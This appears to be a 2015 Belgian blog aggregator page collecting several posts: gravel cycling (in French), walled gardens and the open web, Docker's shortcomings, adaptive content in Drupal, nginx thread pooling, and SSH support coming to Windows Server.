Entre la route et le VTT

Nous avons donc défini deux grandes familles de vélos sportifs. Tout d’abord les vélos de routes, avec des pneus de moins de 30mm, taillés pour la vitesse sur une surface relativement lisse mais incapables de rouler hors du bitume. Ensuite les VTTs, avec des pneus de plus de 40mm, capables de passer partout mais qui sont tellement inefficaces sur la route qu’il est préférable de les emmener en voiture jusqu’à l’endroit où l’on veut pratiquer. Il existe également bien d’autres types de vélos mais ils sont moins efficaces en terme de performance : le city-bike, inspiré du VTT qui optimise l’aspect pratique, le « hollandais », qui optimise le confort dans un pays tout plat aux pistes cyclables bien entretenues ou le fixie, qui optimise le côté hipster de son possesseur.

Mais ne pourrait-on pas imaginer un vélo orienté performance qui serait efficace sur route et qui pourrait passer partout où le VTT passe ?

Pour répondre à cette question, il faut se tourner vers une discipline particulièrement populaire en Belgique : le cyclocross. Le cyclocross consiste à prendre un vélo de route, à lui mettre des pneus un peu plus larges (entre 30 et 35mm) et à le faire rouler dans la boue en hiver. Lorsque la boue est trop profonde ou que le terrain est trop pentu, le cycliste va descendre de sa machine, l’épauler et courir tout en la portant. L’idée est que, dans ces situations, il est de toutes façons plus rapide de courir (10-12km/h) que de pédaler (8-10km/h).

16349387856_4def3a1116_z

Une coureuse de cyclocross, par Sean Rowe

Le vélo de cyclocross doit donc être léger (pour le porter), capable de rouler et virer dans la boue mais avec un amortissement minimal pour être performant sur les passages les plus lisses.

Ce type de configuration se révèle assez efficace sur la route : un vélo de cyclo-cross roule sans difficulté au-delà des 30km/h mais permet également de suivre un VTT traditionnel dans les chemins forestiers. L’amortissement moindre nécessitera cependant de diminuer la vitesse dans les descentes très rugueuses. Les montées les plus techniques sur les sols les plus gras nécessiteront de porter le vélo (avec parfois le résultat inattendu de dépasser les vététistes en train de mouliner).

 

La naissance du gravel

Si une course de vélo de route peut se parcourir sur des longues distances entre un départ et une arrivée, le cyclo-cross, le VTT et les autres disciplines sont traditionnellement confinées à un circuit court que les concurrents parcourent plusieurs fois. La première raison est qu’il est de nos jours difficile de concevoir un long parcours qui ne passera pas par la route.

De plus, si des motos et des voitures peuvent accompagner les vélos de routes pour fournir le ravitaillement, l’aide technique et la couverture médiatique, il n’en est pas de même pour les VTTs. Impossible donc de filmer correctement une course de VTT ou de cyclocross qui se disputerait sur plusieurs dizaines de km à travers les bois.
20150517_172633

Le  genre de route qui donne son nom à la discipline.

L’idée sous-jacente du « gravel » est de s’affranchir de ces contraintes et de proposer des courses longues (parfois plusieurs centaines de km) entre un départ et une arrivée mais en passant par des sentiers, des chemins encaissés et, surtout, ces longues routes en gravier qui sillonnent les États-Unis entre les champs et qui ont donné leur nom à la discipline. Le passage par des routes asphaltées est également possible.

Des points de ravitaillements sont prévus par les organisateurs le long du parcours mais, entre ces points, le cyclistes sera le plus souvent laissé à lui-même. Transporter des chambre à air, du matériel de réparation et des sparadraps fait donc partie du sport !

Quand à la couverture média, elle sera désormais effectuée par les cyclistes eux-mêmes grâce à des caméras embarquées sur les vélos ou sur les casques.

 

L’essor du gravel

Au fond, il n’y a rien de vraiment neuf. Le mot « gravel » n’est jamais qu’un nouveau mot accolé à une discipline vieille comme le vélo lui-même. Mais ce mot « gravel » a permis une renaissance et une reconnaissance du concept.

Le succès des vidéos embarquées de cyclistes parcourant 30km à travers champs, 10km sur de l’asphalte avant d’attaquer 500m de côtes boueuses et de traverser une rivière en portant leur vélo contribuent à populariser le « gravel », principalement aux États-Unis où le cyclo-cross est également en plein essor.

La popularité de courses comme Barry-Roubaix (ça ne s’invente pas !) ou Gold Rush Gravel Grinder intéresse les constructeurs qui se mettent à proposer des cadres, des pneus et du matériel spécialement conçus pour le gravel.

 

Se mettre au gravel ?

Contrairement au vélo sur route ou au VTT sur circuit, le gravel comporte un volet romanesque. L’aventure, se perdre, explorer et découvrir font partie intégrante de la discipline. Dans l’équipe Deux Norh, par exemple, les sorties à vélo sont appelées des « quêtes » (hunt). L’intérêt n’est pas tant dans l’exploit sportif que de raconter une aventure, une histoire.

20150517_182129

L’auteur de ces lignes au cours d’une montée à travers bois.

Le gravel étant, par essence, un compromis, les vélos de cyclo-cross sont souvent les plus adaptés pour le pratiquer. D’ailleurs, beaucoup de cyclistes confirmés affirment que s’ils ne devaient avoir qu’un seul vélo pour tout faire, ce serait leur vélo de cyclo-cross. Cependant, il est tout à fait possible de pratiquer le gravel avec un VTT hardtail (sans amortissement arrière). Le VTT est plus confortable et passe plus facilement les parties techniques au prix d’une vitesse moindre dans les parties plus roulantes. Pour les parcours les plus sablonneux, certains vont jusqu’à s’équiper de pneus ultra-larges (les « fat-bikes »).

Par contre, je n’ai encore jamais vu de clubs de gravel ni la moindre course organisée en Belgique. C’est la raison pour laquelle j’invite les cyclistes belges à rejoindre l’équipe Belgian Gravel Grinders sur Strava, histoire de se regrouper entre gravelistes solitaires et, pourquoi pas, organiser des sorties communes.

Si l’aventure vous tente, n’hésitez pas à rejoindre l’équipe sur Strava. Et si vous deviez justement acheter un nouveau vélo et hésitiez entre un VTT ou un vélo de route, jetez un œil aux vélos de cyclo-cross. On ne sait jamais que vous ayez soudainement l’envie de bouffer du gravier !

 

Photo de couverture par l’auteur.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 23, 2015 04:17 PM

Dries Buytaert

Winning back the Open Web

The web was born as an open, decentralized platform allowing different people in the world to access and share information. I got online in the mid-nineties when there were maybe 100,000 websites in the world. Google didn't exist yet and Steve Jobs had not yet returned to Apple. I remember the web as an "open web" where no one was really in control and everyone was able to participate in building it. Fast forward twenty years, and the web has taken the world by storm. We now have a hundreds of millions of websites. Look beyond the numbers and we see another shift: the rise of a handful of corporate "walled gardens" like Facebook, Google and Apple that are becoming both the entry point and the gatekeepers of the web. Their dominance has given rise to major concerns.

We call them "walled gardens" because they control the applications, content and media on their platform. Examples include Facebook or Google, which control what content we get to see; or Apple, which restricts us to running approved applications on iOS. This is in contrast to the "open web", where users have unrestricted access to applications, content and media.

Facebook is feeling the heat from Google, Google is feeling the heat from Apple but none of these walled gardens seem to be feeling the heat from an open web that safeguards our privacy and our society's free flow of information.

This blog post is the result of people asking questions and expressing concerns about a few of my last blog posts like the Big Reverse of the Web, the post-browser era of the web is coming and my DrupalCon Los Angeles keynote. Questions like: Are walled gardens good or bad? Why are the walled gardens winning? And most importantly; how can the open web win? In this blog post, I'd like to continue those conversations and touch upon these questions.

Are "walled gardens" good or bad for the web?

What makes this question difficult is that the walled gardens don't violate the promise of the web. In fact, we can credit them for amplifying the promise of the web. They have brought hundreds of millions of users online and enabled them to communicate and collaborate much more effectively. Google, Apple, Facebook and Twitter have a powerful democratizing effect by providing a forum for people to share information and collaborate; they have made a big impact on human rights and civil liberties. They should be applauded for that.

At the same time, their dominance is not without concerns. With over 1 billion users each, Google and Facebook are the platforms that the majority of people use to find their news and information. Apple has half a billion active iOS devices and is working hard to launch applications that keep users inside their walled garden. The two major concerns here are (1) control and (2) privacy.

First, there is the concern about control, especially at their scale. These organizations shape the news that most of the world sees. When too few organizations control the media and flow of information, we must be concerned. They are very secretive about their curation algorithms and have been criticized for inappropriate censoring of information.

Second, they record data about our behavior as we use their sites (and the sites their ad platforms serve) inferring information about our habits and personal characteristics, possibly including intimate details that we might prefer not to disclose. Every time Google, Facebook or Apple launch a new product or service, they are able to learn a bit more about everything we do and control a bit more about our life and the information we consume. They know more about us than any other organization in history before, and do not appear to be restricted by data protection laws. They won't stop until they know everything about us. If that makes you feel uncomfortable, it should. I hope that one day, the world will see this for what it is.

While the walled gardens have a positive and democratizing impact on the web, who is to say they'll always use our content and data responsibly? I'm sure that to most critical readers of this blog, the open web sounds much better. All things being equal, I'd prefer to use alternative technology that gives me precise control over what data is captured and how it is used.

Why are the walled gardens winning?

Why then are these walled gardens growing so fast? If the open web is theoretically better, why isn't it winning? These are important questions about future of the open web, open source software, web standards and more. It is important to think about how we got to a point of walled garden dominance, before we can figure out how an open web can win.

The biggest reason the walled gardens are winning is because they have a superior user experience, fueled by data and technical capabilities not easily available to their competitors (including the open web).

Unlike the open web, walled gardens collect data from users, often in exchange for free use of a service. For example, having access to our emails or calendars is incredibly important because it's where we plan and manage our lives. Controlling our smartphones (or any other connected devices such as cars or thermostats) provides not only location data, but also a view into our day-to-day lives. Here is a quick analysis of the types of data top walled gardens collect and what they are racing towards:

Walled gardens data

On top of our personal information, these companies own large data sets ranging from traffic information to stock market information to social network data. They also possess the cloud infrastructure and computing power that enables them to plow through massive amounts of data and bring context to the web. It's not surprising that the combination of content plus data plus computing power enables these companies to build better user experiences. They leverage their data and technology to turn “dumb experiences” into smart experiences. Most users prefer smart contextual experiences because they simplify or automate mundane tasks.

Walled gardens technology

Can the open web win?

I still believe in the promise of highly personalized, contextualized information delivered directly to individuals, because people ultimately want better, more convenient experiences. Walled gardens have a big advantage in delivering such experiences, however I think the open web can build similar experiences. For the open web to win, we first must build websites and applications that exceed the user experience of Facebook, Apple, Google, etc. Second, we need to take back control of our data.

Take back control over the experience

The obvious way to build contextual experiences is by combining different systems that provide open APIs; e.g. we can integrate Drupal with a proprietary CRM and commerce platform to build smart shopping experiences. This is a positive because organizations can take control over the brand experience, the user experience and the information flow. At the same time users don't have to trust a single organization with all of our data.

Open web current state

The current state of the web: one end-user application made up of different platform that each have their own user experience and presentation layer and stores its own user data.

To deliver the best user experience, you want “loosely-coupled architectures with a highly integrated user experience”. Loosely-coupled architectures so you can build better user experiences by combining your systems of choice (e.g. integrate your favorite CMS with your favorite CRM with your favorite commerce platform). Highly-integrated user experiences so can build seamless experiences, not just for end-users but also for content creators and site builders. Today's open web is fragmented. Integrating two platforms often remains difficult and the user experience is "mostly disjointed" instead of "highly integrated". As our respective industries mature, we must focus our attention to integrating the user experience as well as the data that drives that user experience. The following "marketecture" illustrates that shift:

Shared integration and user experience layer

Instead of each platform having its own user experience, we have a shared integration and presentation layer. The central integration layer serves to unify data coming from distinctly different systems. Compatible with the "Big Reverse of the Web" theory, the presentation layers is not limited to a traditional web browser but could include push technology like a notification.

For the time being, we have to integrate with the big walled gardens. They need access to great content for their users. In return, they will send users to our sites. Content management platforms like Drupal have a big role to play, by pushing content to these platforms. This strategy may sound counterintuitive to many, since it fuels the growth of walled gardens. But we can't afford to ignore ecosystems where the majority of users are spending their time.

Control personal data

At the same time, we have to worry about how to leverage people's data while protecting their privacy. Today, each of these systems or components contain user data. The commerce system might have data about past purchasing behavior, the content management system about who is reading what. Combining all the information we have about a user, across all the different touch-points and siloed data sources will be a big challenge. Organizations typically don't want to share user data with each other, nor do users want their data to be shared without their consent.

The best solution would be to create a "personal information broker" controlled by the user. By moving the data away from the applications to the user, the user can control what application gets access to what data, and how and when their data is shared. Applications have to ask the user permission to access their data, and the user explicitly grants access to none, some or all of the data that is requested. An application only gets access to the data that we want to share. Permissions only need to be granted once but can be revoked or set to expire automatically. The application can also ask for additional permissions at any time; each time the person is asked first, and has the ability to opt out. When users can manage their own data and the relationships they have with different applications, and by extension with the applications' organizations, they take control over their own privacy. The government has a big role to play here; privacy law could help accelerate the adoption of "personal information brokers".

Open web personal information broker

Instead of each platform having its own user data, we move the data away from the applications to the users, managed by a "personal information broker" under the user's control.

Open web shared broker

The user's personal information broker manages data access to different applications.

Conclusion

People don't seem so concerned about their data being hosted with these walled gardens since they've willingly given it to date. For the time being, "free" and "convenient" will be hard to beat. However, my prediction is that these data privacy issues are going to come to a head in the next five to ten years, and lack of transparency will become unacceptable to people. The open web should focus on offering user experiences that exceed those provided by walled gardens, while giving users more control over their user data and privacy. When the open web wins through improved transparency, the closed platforms follow suit, at which point they'll no longer be closed platforms. The best case scenario is that we have it all: a better data-driven web experience that exists in service to people, not in the shadows.

by Dries at June 23, 2015 08:58 AM

Frank Goossens

Mobile web vs. Native apps; Forrester’s take

So web is going away, being replaced by apps? Forrester researched and does not agree;

Based on this data and other findings in the new report, Forrester advises businesses to design their apps only for their best and most loyal or frequent customers – because those are the only one who will bother to download, configure and use the application regularly. For instance, most retailers say their mobile web sales outweigh their app sales, the report says. Meanwhile, outside of these larger players, many customers will use mobile websites instead of a business’ native app.

My biased interpretation; unless you think can compete with Facebook for mobile users’ attention, mobile apps should maybe not be your most important investment. Maybe PPK conceeded victory too soon after all?

by frank at June 23, 2015 07:45 AM

June 22, 2015

Frank Goossens

RIngland; de stilste zomerhit?

“Laat de mensen dansen” wordt dus verbannen van VRT en Q-music omdat het te politiek zou zijn. Nooit gedacht dat Bart & Slongs de Vlaamse Johnny & Sid zouden worden … Kan ik dat plaatje ergens kopen?

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 22, 2015 04:29 PM

June 21, 2015

Vincent Van der Kussen

A critical view on Docker

TL;DR Before you start reading this, I want to make it clear that I absolutely don't hate Docker or the application container idea in general, at all!. I really see containers become a new way of doing things in addition to the existing technologies. In fact, I use containers myself more and more.

Currently I'm using Docker for local development because it's so easy to get your environment up and running in just e few seconds. But of course, that is "local" development. Things start to get interesting when you want to deploy over multiple Docker hosts in a production environment.

At the "Pragmatic Docker Day" a lot of people who were using (some even in production) or experimenting with Docker showed up. Other people were completely new to Docker so there was a good mix.

During the Open Spaces in the afternoon we had a group of people who decided to stay outside (the weather was really to nice to stay inside) and started discussing the talks that were given in the morning sessions. This evolved in a rather good discussion about everyone's personal view on the current state of containers and what they might bring in the future. People chimed in and added their opinion to the conversation

That inspired me to write about the following items which are a combination of the things that came up during the conversations and my own view on the current state of Docker.

The Docker file

A lot of people are now using some configuration management tool and have invested quite some time in their tool of choice to deploy and manage the state of their infrastructure. Docker provides the Dockerfile to build/configure your container images and it feels a bit like a "dirty" way/hack to do this given that config management tools provide some nice features.

Quite some people are using their config management tool to build their container images. I for instance upload my Ansible playbooks into the image (during build) and then run them. This allows me to reuse existing work I know that works. And I can use it for both containers and non-containers.

It would have been nice if Docker somehow provided a way to integrate the exiting configuration management tools a bit better. Vagrant does a better job here.

As far as I know you also can't use variables (think Puppet Hiera or Ansible Inventory) inside your Dockerfile. Something configuration management tools happen to do be very good at.

Bash scripting

When building more complex Docker images you notice that a lot of Bash scripting is used to prep the image and make it do what you want. Things like passing variables into configuration files, creating users, preparing storage, configure and start services, etc.. While Bash is not necessarily a bad thing, it all feels like a workaround for things that are so simple when not using containers.

Dev vs Ops all over again?

The people I talked to agreed on the fact that Docker is rather developer focused and that it allows them to build images containing a lot of stuff where you might have no control over. It abstracts away possible issues. The container works so all is well..right?

I believe that when you start building and using containers the DevOps aspect is more important then ever. If for instance a CVE is found in a library/service that has been included in the container image you'll need to update this in your base image and then rolled out through your deployment chain. To make this possible all stakeholders must know what is included, and in which version of the Docker image. Needless to say this needs both ops and devs working together. I don't think there's a need for "separation of concerns" as Docker likes to advocate. Haven't we learned that creating silo's isn't the best idea?

More complexity

Everything in the way you used to work becomes different once you start using containers. The fact that you can't ssh into something or let your configuration management make some changes just feels awkward.

Networking

By default Docker creates a Linux Bridge on the host where it creates interfaces for each container that gets started. It then adjusts the iptables nat table to pass traffic entering a port on the host to the exposed port inside the container.

To have a more advanced network configuration you need to look at tools like weave, flannel, etc.. Which require more research to see what fits your specific use case best.

Recently I was wondering if it was possible to have multiple nics inside your container because I wanted this to test Ansible playbooks that configure multiple nics. Currently it's not possible but there's a ticket open on GitHub https://github.com/docker/docker/issues/1824 which doesn't give me much hope.

Service discovery

Once you go beyond playing with containers on your laptop and start using multiple docker hosts to scale your applications, you need to have a way to know where the specific service you want to connect to is running and on what port it is running. You probably don't want to manually define ports per container on each host because that will become tedious quite fast. This is were tools like Consul, etcd etc.. come in. Again some extra tooling/complexity.

Storage

You will always have something that needs persistence and when you do, you'll need storage. Now, when using containers the Docker way, you are assumed to put as much as possible inside the container image. But some things like log files, configuration files, application generated data, etc.. are a moving target.

Docker provides volumes to pass storage from the host inside a container. Basically you map a path on the host to a path inside the container. But this poses some questions like, how do I share this in case the container gets started, how can I make sure this is secure? How do I manage all these volumes? What is the best way to share this among different hosts? ...

One way to consolidate your volumes is to use "data-only" containers. This means that you run a container with some volumes attached to it and then link to them from other containers so they all use a central place to store data. This works but has some drawbacks imho.

This container just needs to exist (it doesn't even need to be running) and as long as this container or a container that links to it exists, the volumes are kept on the system. Now, if you by accident delete the container holding the volumes or you delete the last container linking to them, you loose all your data. With containers coming and going, it can become tricky to keep track of this and making mistakes at this level has some serious consequences.

Security

Docker images

One of the "advantages" that Docker brings is the fact that you can pull images from the Docker hub and from what I have read this is in most cases encouraged. Now, everyone I know who runs a virtualization platform will never pull a Virtual Appliance and run it without feeling dirty. when using a cloud platform, chances are that you are using prebuild images to deploy new instances from. This is analogue to the Docker images with that difference that people who care about their infrastructure build their own images. Now most Linux distributions provide an "official" Docker image. These are the so called "trusted" images which I think is fine to use as a base image for everything else. But when I search the Docker Hub for Redis I get 1546 results. Do you trust all of them and would you use them in your environment?

What can go wrong with pulling an OpenVPN container. Right..?

This is also an interesting read: https://titanous.com/posts/docker-insecurity

User namespacing

Currently there's no user namespacing which means that if a UID inside the docker container matches the UID of a user on the host, that user will have access to the host with the same permissions. This is one of the reasons why you should not run processes as the root user inside containers (and outside). But even then you need to be careful with what you're doing.

Containers, containers, containers..

When you run more and more stuff in containers, you'll end up with a few hundred, thousand or even more containers. If you're lucky they all share the same base image. And even if they do, you still need to update them with fixes and security patches which results in newer base images. At this point all your existing containers should be rebuild and redeployed. welcome to the immutable world..

So the "problem" just shifts up a layer. A Layer where the developers have more control over what gets added. What do you do when the next OpenSSL bug pops up? Do you know which containers has which OpenSSL version..?

Minimal OS's

Everyone seems to be building these mini OS's these days like CoreOS, ProjectAtomic, RancherOS, etc.. The idea is that updating the base OS is a breeze (reboot, AB partition etc..) and all services we need are running inside containers.

That's all nice but people with a sysadmin background will quickly start asking questions like, can I do software raid? Can I add my own monitoring on this host? Can I integrate with my storage setup? etc...

Recap

What I wanted to point out is that when you decide to start using containers, keep in mind that this means you'll need to change your mindset and be ready to learn quite some new ways to do things.

While Docker is still young and has some shortcomings I really enjoy working with it on my laptop and use it for testing/CI purposes. It's also exciting (and scary at the same time) to see how fast all of this evolves.

I've been writing this post on and off for some weeks and recently some announcements at Dockercon might address some of the above issues. Anyway, if you've read until here, I want to thank you and good luck with all your container endeavors.

by Vincent Van der Kussen at June 21, 2015 10:00 PM

Wim Leers

Eaton & Urbina: structured, intelligent and adaptive content

While walking, I started listening to Jeff Eaton’s Insert Content Here podcast, episode 25: Noz Urbina Explains Adaptive Content. People must’ve looked strangely at me because I was smiling and nodding — still walking :) Thanks Jeff & Noz!

Jeff Eaton explained how the web world looks at and defines the term WYSIWYG. Turns out that in the semi-structured, non-web world that Noz comes from, WYSIWYG has a totally different interpretation. And they ended renaming it to what it really was: WYSIWOO.

Jeff also asked Noz what “adaptive content” is exactly. Adaptive content is a more specialized/advanced form of structured content, and in fact “structured content”, “intelligent content” and “adaptive content” form a hierarchy:

In other words, adaptive content is also intelligent and structured; intelligent content is also structured, but not all structured content is also intelligent or adaptive, nor is all intelligent content also adaptive.

Basically, intelligent content better captures the precise semantics (e.g. not a section, but a product description). Adaptive content is about using those semantics, plus additional metadata (“hints”) that content editors specify, to adapt the content to the context it is being viewed in. E.g. different messaging for authenticated versus anonymous users, or different nuances depending on how the visitor ended up on the current page (in other words: personalization).

Noz gave an excellent example of how adaptive content can be put to good use: he described how we he had arrived in Utrecht in the Netherlands after a long flight, “checked in” to Utrecht on Facebook, and then Facebook suggested to him 3 open restaurants, including cuisine type and walking distance relative to his current position. He felt like thanking Facebook for these ads — which obviously is a rare thing, to be grateful for ads!

Finally, a wonderful quote from Noz Urbina that captures the essence of content modeling:

How descriptive do we make it without making it restrictive?

If it isn’t clear by now — go listen to that podcast! It’s well worth the 38 minutes of listening. I only captured a few of the interesting points, to get more people interested and excited.1

What about adaptive & intelligent content in Drupal 8?

First, see my closely related article Drupal 8: best authoring experience for structured content?.

Second, while listening, I thought of many ways that Drupal 8 is well-prepared for intelligent & adaptive content. (Drupal already does structured content by means of Field API and the HTML tag restrictions in the body field.) Implementing intelligent & adaptive will surely require experimentation, and different sites/use cases will prefer different solutions, but:

I think that those two modules would be very interesting, useful additions to the Drupal ecosystem. If you are working on this, please let me know — I would love to help!


  1. That’s right, this is basically voluntary marketing for Jeff Eaton — you’re welcome, Jeff! 

by Wim Leers at June 21, 2015 06:08 PM

June 19, 2015

Frank Goossens

Music from Bruxelles ma belle Tube: Casssandra

Now that I found Gilles Peterson’s WorldWide as a podcast on Radio Nova I’m once again enjoying the nuggets Gilles disperses to his worldwide audience. A couple of weeks ago he played “Sifflant Soufflant” by Casssandre (yes, 3 s’es, must be a Belgian thing), a Belgian jazz singer. While looking for that specific track on YouTube did not yield a result, I did find this live video which is part a series of performances recorded in beautiful places in Brussels;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

So there you have it; 2 nuggets in one go. Enjoy your weekend!

by frank at June 19, 2015 05:39 AM

June 18, 2015

Mattias Geniar

Increasing Nginx Performance With Thread Pooling

The post Increasing Nginx Performance With Thread Pooling appeared first on ma.ttias.be.

Fascinating stuff.

The result of enabling thread pooling and then benchmarking the change shows some pretty impressive performance gains.

Now our server produces 9.5 Gbps, compared to ~1 Gbps without thread pools!

and

The average time to serve a 4-MB file has been reduced from 7.42 seconds to 226.32 milliseconds (33 times less), and the number of requests per second has increased by 31 times (250 vs 8)!

The title of the article seems wrong, as a best-case scenario has the possibility to increase bandwidth 10x and the time to serve a file is 33x faster (under the best of circumstances).

Worth a read and definitely worth a test in your lab: Thread Pools in NGINX Boost Performance 9x!

The post Increasing Nginx Performance With Thread Pooling appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 08:00 PM

How SSH In Windows Server Completely Changes The Game

The post How SSH In Windows Server Completely Changes The Game appeared first on ma.ttias.be.

A few days ago, Microsoft announced their plans to support SSH.

At first, I only skimmed the news articles and misinterpreted the news as PowerShell getting SSH support to act as a client, but it appears this goes much deeper: SSH coming to Windows Server is both client and server support.

A popular request the PowerShell team has received is to use Secure Shell protocol and Shell session (aka SSH) to interoperate between Windows and Linux – both Linux connecting to and managing Windows via SSH and, vice versa, Windows connecting to and managing Linux via SSH.
Looking Forward: Microsoft Support for Secure Shell (SSH)

While the announcement in and of itself is worth a read, the comments show a lot of concern into the how of the implementation, hoping for industry standard implementations instead of quirky forks of the protocol.

In the comments, the PowerShell official user also confirms the SSH implementation having both client and server support.

The SSH implementation will support both Client and Server.

This is super exciting.

SSH Public Key Authentication

SSH is just a protocol. Windows already has several protocols & methods for managing a server (RPC, PowerShell, AD Group Policies, ...), so why bring another one?

Supporting the SSH server on Windows can bring the biggest advancement to Windows in a long time: SSH public key authentication.

Historically, managing a Windows server was either based on username/password combinations or NTLM. There are other alternatives, but these 2 are the most widely used. You either type your username and password, or you belong to an Active Directory domain for easier access.

Managing standalone Windows machines has therefore always been a serious annoyance. It requires keeping a list of username/password combinations.

If SSH support in Windows is done right, it would mean a new authentication method that is perfect for automation tasks.

It inevitably also means that supporting SSH on Windows isn't trivial: it ties into the user management, authentication & authorization. This would be a major feature to push out.

Config Management For Windows

Configuration Management isn't new for Windows. In fact, in many regards, automating state and configuration is far more advanced in Windows than it is on Linux.

However, the tools to automate on Windows have mostly been proprietary, complex and very expensive to both purchase and maintain. In the Open Source world there are many alternatives for config management a user could choose from.

Since a couple of years, even the Open Source tools have begun to show rudimentary support for managing Windows Server (ref.: Puppet, Chef, Ansible, ...).

Having SSH access to a Windows Server with proper SSH public key support would allow all kind of SSH-based config management tools to be used for managing a Windows Server, whether it's in an Active Directory domain or a standalone server.

Even if Ansible didn't have native Windows support, just having SSH available would be sufficient to use Ansible to completely manage a Windows server.

Imagine the power.

The Proof Of The Eating Is In The Pudding

Hmmm, pudding ...

Sorry, I digress.

As Microsoft has correctly admitted, this is the 3rd attempt to integrate SSH into Windows.

The first attempts were during PowerShell V1 and V2 and were rejected. Given our changes in leadership and culture, we decided to give it another try and this time, because we are able to show the clear and compelling customer value, the company is very supportive.

A public statement proclaiming support for native SSH is a powerful thing, but it's by no means a guarantee that it'll happen. The lack of a clear timeline also shows how early on the process this idea lies.

I'm hoping support for SSH server in Windows Server eventually becomes a standard on every server. I'm biased because I come from a Linux background, but having an SSH server with public key authentication would greatly simplify my life of automating Windows environments.

There are alternatives for doing that. There have always been alternatives. I just don't like them. I like having SSH access to manage a server and I'm rooting for Microsoft to pull this off as well.

The post How SSH In Windows Server Completely Changes The Game appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 07:27 PM